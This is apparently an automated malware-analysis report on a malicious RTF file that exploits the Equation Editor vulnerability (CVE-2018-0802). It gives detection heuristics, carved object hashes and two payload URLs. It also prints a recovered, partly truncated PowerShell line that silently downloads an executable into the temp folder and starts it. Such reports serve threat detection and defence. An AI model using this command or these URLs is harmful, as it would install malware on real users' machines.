MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
The sample is an RTF document containing OLE object data and triggering heuristics related to Equation Editor exploits, specifically CVE-2018-0802. It also contains embedded URLs that likely serve as download locations for a second-stage payload. The presence of shellcode-related signals in static triage further supports the exploitation of a vulnerability for client execution.
Heuristics 7
-
Equation Editor CLSID critical CVE likely RTF_EQUATION_EDITOREquation Editor OLE CLSID found inside an OLE object — exploited by CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798
-
ClamAV: Rtf.Exploit.CVE_2018_0802-6825822-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Rtf.Exploit.CVE_2018_0802-6825822-0
-
Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
\objupdate forces OLE activation high RTF_OBJUPDATERTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
-
OLE object data medium RTF_OBJDATARTF contains 5 \objdata section(s) — embedded OLE objects
-
OlePres presentation stream in RTF OLE object medium RTF_OLEPRES_STREAMRTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://rsaustria.com/soperos.bin In RTF body
- http://galeona.com/soperos.binIn RTF body
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
objdata_00_off000027bc.bin |
rtf-objdata-decoded | RTF \objdata at offset 0x27BC | 377 bytes |
SHA-256: 9f9df4f20bf46ffe79f02ef9500bcd656d2853d076bd9955c086799dc82c74b0 |
|||
objdata_01_off0000467d.bin |
rtf-objdata-decoded | RTF \objdata at offset 0x467D | 221 bytes |
SHA-256: ad609ffc162a8f2c51146179a90ce98f4af7f47c54c9abe165f6c6d053ed0b92 |
|||
objdata_02_off00004899.bin |
rtf-objdata-decoded | RTF \objdata at offset 0x4899 | 490 bytes |
SHA-256: 2defbf0a4b8af531cb5a88140d48dfcceeda8f4965ea258162ac5b7fcb12c1a7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis recovered URL(s): http://rsaustria.com/soperos.bin Static shellcode analysis recovered command string(s): PowerShell -W Hidden ""function platolinux([String] $fausnake){(New-Object System.Net.WebClient).DownloadFile($fausnake,'%TEMP%\clugainn.exe');Start-Process '%TEMP%\cluga
|
|||
objdata_03_off00005499.bin |
rtf-objdata-decoded | RTF \objdata at offset 0x5499 | 4681 bytes |
SHA-256: 2739ee55bfe1b2a7508c33fd0cfd32fd82a891d81959369110cce62e729ae09e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.